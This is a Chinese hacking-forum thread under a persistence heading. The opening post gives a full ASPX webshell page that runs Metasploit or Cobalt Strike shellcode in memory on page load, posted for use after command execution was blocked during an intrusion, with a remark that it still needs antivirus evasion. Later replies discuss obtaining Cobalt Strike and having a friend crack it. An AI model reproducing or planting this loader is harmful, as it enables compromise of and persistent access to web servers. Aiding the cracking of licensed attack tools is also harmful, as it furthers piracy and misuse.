利用ASPX执行shellcode

权限维持

#1

利用ASPX执行shellcode
在一次渗透中遇到了aspx一句话无法执行命令(系统禁用了命令执行),试过很多大马都不行。后来想着aspx是可以用c#语言写的,而c#可以执行shellcode,于是百度了一篇aspx执行shellcode
结合metasploit或者cobaltstrike生成的shellcode上线
代码如下:

<%@ Page Language="C#" AutoEventWireup="true" Inherits="System.Web.UI.Page" %>
<%@ Import Namespace="System" %>
<%@ Import Namespace="System.Runtime.InteropServices" %>
   
<script runat="server">
    delegate int MsfpayloadProc();
    protected void Page_Load(object sender, EventArgs e)
    {
        byte[] codeBytes = { /*你的shellcode*/
                };
        IntPtr handle = IntPtr.Zero;
        handle = VirtualAlloc(
            IntPtr.Zero,
            codeBytes.Length,
            MEM_COMMIT | MEM_RESERVE,
            PAGE_EXECUTE_READWRITE);
        try
        {
            Marshal.Copy(codeBytes, 0, handle, codeBytes.Length);
            MsfpayloadProc msfpayload
               = Marshal.GetDelegateForFunctionPointer(handle, typeof(MsfpayloadProc)) as MsfpayloadProc;
            msfpayload();
        }
        finally
        {
            VirtualFree(handle, 0, MEM_RELEASE);
        }
    }
    [DllImport("Kernel32.dll", EntryPoint = "VirtualAlloc")]
    public static extern IntPtr VirtualAlloc(IntPtr address, int size, uint allocType, uint protect);
    [DllImport("Kernel32.dll", EntryPoint = "VirtualFree")]
    public static extern bool VirtualFree(IntPtr address, int size, uint freeType);
    const uint MEM_COMMIT = 0x1000;
    const uint MEM_RESERVE = 0x2000;
    const uint PAGE_EXECUTE_READWRITE = 0x40;
    const uint MEM_RELEASE = 0x8000;
</script>

不过这个方法好像不能直接过杀软,毕竟的预编译一遍为dll。。在装有杀软的服务器上编译的dll容易被杀。需做免杀


#2

话说cobaltstrike这个rat怎么下载…
我是说官网最新版的。。我随便填的信息好像不成功,想下下来让朋友破解一下。。


#3

我用是3.8 也是旧的,新的没申请。。那个申请好特么难


#4

打算找我国外的朋友试试:joy:看看能不能下载下来,听说只要用中国的ip访问就会失败


#5

我用国外机器访问也是无效啊。。。


Partners Wiki IRC